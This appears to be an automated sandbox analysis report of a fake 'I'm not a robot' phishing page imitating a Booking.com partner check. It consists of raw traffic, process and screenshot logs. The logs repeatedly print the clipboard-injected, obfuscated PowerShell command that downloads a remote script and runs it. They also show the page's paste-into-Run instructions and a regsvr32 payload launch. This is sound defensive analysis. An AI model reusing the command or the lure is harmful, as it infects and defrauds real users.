        Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /cj06ld.txt HTTP/1.1host: files.catbox.moeaccept: */*accept-encoding: identityif-unmodified-since: Tue, 27 May 2025 17:01:28 GMTuser-agent: Microsoft BITS/7.8
        Source: global trafficDNS traffic detected: DNS query: confirm-id2719.click
        Source: global trafficDNS traffic detected: DNS query: partner.booking.com
        Source: global trafficDNS traffic detected: DNS query: bstatic.com
        Source: global trafficDNS traffic detected: DNS query: cdn.cookielaw.org
        Source: global trafficDNS traffic detected: DNS query: munchkin.marketo.net
        Source: global trafficDNS traffic detected: DNS query: try.abtasty.com
        Source: global trafficDNS traffic detected: DNS query: code.jquery.com
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: files.catbox.moe
        Source: unknownHTTP traffic detected: POST /antifraud HTTP/1.1Host: confirm-id2719.clickConnection: keep-aliveContent-Length: 0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: application/jsonsec-ch-ua-mobile: ?0Accept: */*Origin: https://confirm-id2719.clickSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.57:443 -> 192.168.2.18:49735 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 108.181.20.43:443 -> 192.168.2.18:49737 version: TLS 1.2
        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
        Source: classification engineClassification label: mal84.phis.evad.win@29/11@23/214
        Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\BIT8664.tmp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yirvsiyf.smg.ps1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.ini
        Source: C:\Windows\System32\svchost.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2076,i,2738407938671327035,787659038189539863,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1872 /prefetch:3
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://confirm-id2719.click/"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2076,i,2738407938671327035,787659038189539863,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1872 /prefetch:3
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification"
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12
        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bitsproxy.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
        Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
        Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

        Data Obfuscation

        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification"

        Persistence and Installation Behavior

        Source: screenshotOCR Text: -8 x about:blank Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter 09:20 ENG p Type here to search SG 29/05/2025
        Source: screenshotOCR Text: -8 about:blank Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter x Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. '.psl I)" 0K to complete verification" v Open: 0K 09:20 ENG p Type here to search SG 29/05/2025
        Source: screenshotOCR Text: -8 about:blank Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter x Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. nsfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj061d.txt') (Senv v Open: 0K 09:20 ENG p Type here to search SG 29/05/2025
        Source: screenshotOCR Text: e about:blank -8 Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C Undo 2. Press CTRL + V Cut 3. Press Enter Copy Paste Delete Select All Right to left Reading order Run Show Unicode control characters Insert Unicode control character Type the nam resource, and open IME Reconversion Open: 09:20 ENG p Type here to search SG 29/05/2025
        Source: screenshotOCR Text: e about:blank -8 Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter x Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. shell -nop h -e b ass -c "Stat-BitsTransfer Open: 09:20 ENG p Type here to search SG 29/05/2025
        Source: Chrome DOM: 0.2OCR Text: Robot or human ? Check the box to confllm that you're human. Thank You! I'm not a robot Privacy - 'Tenn.: Verification Steps 1. Press Windows Button 'C 2. Press CTRL + V 3. Press Enter
        Source: screenshotOCR Text: -8 about:blank Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! c I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter x Run nl>l Type the e of a program, folder, document or Internet resource, and Windows will open It for you. Open: 09:20 ENG p Type here to search SG 29/05/2025
        Source: screenshotOCR Text: -8 x about:blank Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! c I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter 09:20 ENG p Type here to search SG 29/05/2025
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeClipboard modification: powershell -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: \KnownDlls\BitsProxy.dll

        Hooking and other Techniques for Hiding and Protection

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
